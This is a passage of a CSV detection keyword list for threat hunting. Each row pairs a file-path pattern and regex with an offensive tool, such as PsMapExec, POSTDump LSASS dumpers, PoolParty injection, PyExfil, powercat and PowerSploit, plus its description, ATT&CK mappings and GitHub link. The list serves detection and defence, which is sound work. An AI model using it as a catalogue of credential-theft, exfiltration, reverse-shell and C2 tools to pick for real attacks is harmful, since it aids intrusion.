Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\eKeys\*",".{0,1000}\\PME\\eKeys\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\LogonPasswords*",".{0,1000}\\PME\\LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\LSA\*",".{0,1000}\\PME\\LSA\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\MSSQL\*",".{0,1000}\\PME\\MSSQL\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\SAM\*",".{0,1000}\\PME\\SAM\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Sessions\*",".{0,1000}\\PME\\Sessions\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\SMB\*",".{0,1000}\\PME\\SMB\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Spraying\*",".{0,1000}\\PME\\Spraying\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Tickets\Kerbdump*",".{0,1000}\\PME\\Tickets\\Kerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\Tickets\MimiTickets*",".{0,1000}\\PME\\Tickets\\MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\User Files\*",".{0,1000}\\PME\\User\sFiles\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PME\VNC\*",".{0,1000}\\PME\\VNC\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\PoC\PrivilegeEscalation*",".{0,1000}\\PoC\\PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*\POC_DLL.dll*",".{0,1000}POC_DLL\.dll.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\POC_DLL.vcxproj*",".{0,1000}\\POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\PoisonTendy\Invokes\*",".{0,1000}\\PoisonTendy\\Invokes\\.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\polenum.py*",".{0,1000}\\polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\PoolParty.cpp*",".{0,1000}\\PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.exe*",".{0,1000}\\PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.hpp*",".{0,1000}\\PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.sln*",".{0,1000}\\PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty.vcxproj*",".{0,1000}\\PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable 
process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\PoolParty-PoolParty\*",".{0,1000}\\PoolParty\-PoolParty\\.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\pop_exfil_client.py*",".{0,1000}\\pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\pop_exfil_server.py*",".{0,1000}\\pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\port_reuse.py*",".{0,1000}\\port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\port_scan.py*",".{0,1000}\\port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\portbender.*",".{0,1000}\\portbender\..{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" 
"*\PoshC2*",".{0,1000}\\PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*\POSTDump.csproj*",".{0,1000}\\POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few 
technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTDump.sln*",".{0,1000}\\POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTDump.sln*",".{0,1000}\\POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTDump\POSTDump\*",".{0,1000}\\POSTDump\\POSTDump\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTMiniDump\*",".{0,1000}\\POSTMiniDump\\.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\POSTMiniDump\*",".{0,1000}\\POSTMiniDump\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*\PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\PotentiallyCrackableAccounts.ps1*",".{0,1000}\\PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\powercat.ps1",".{0,1000}\\powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\powercat.ps1*",".{0,1000}\\powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*\powercat-master\*",".{0,1000}\\powercat\-master\\.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*\powerfun.ps1*",".{0,1000}\\powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\powerglot\*",".{0,1000}\\powerglot\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\powerkatz_x64.dll*",".{0,1000}\\powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to
highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\powerkatz_x86.dll*",".{0,1000}\\powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\Powermad*",".{0,1000}\\Powermad.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*\Powermad.ps1*",".{0,1000}\\Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\power-pwn\*",".{0,1000}\\power\-pwn\\.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - 
T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*\PowershellKerberos*",".{0,1000}\\PowershellKerberos.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*\PowerShellRunnerDll.h*",".{0,1000}\\PowerShellRunnerDll\.h.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\PowerTools.ps1*",".{0,1000}\\PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*\powerup.exe*",".{0,1000}\\powerup\.exe.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Powerup.exe*",".{0,1000}\\Powerup\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
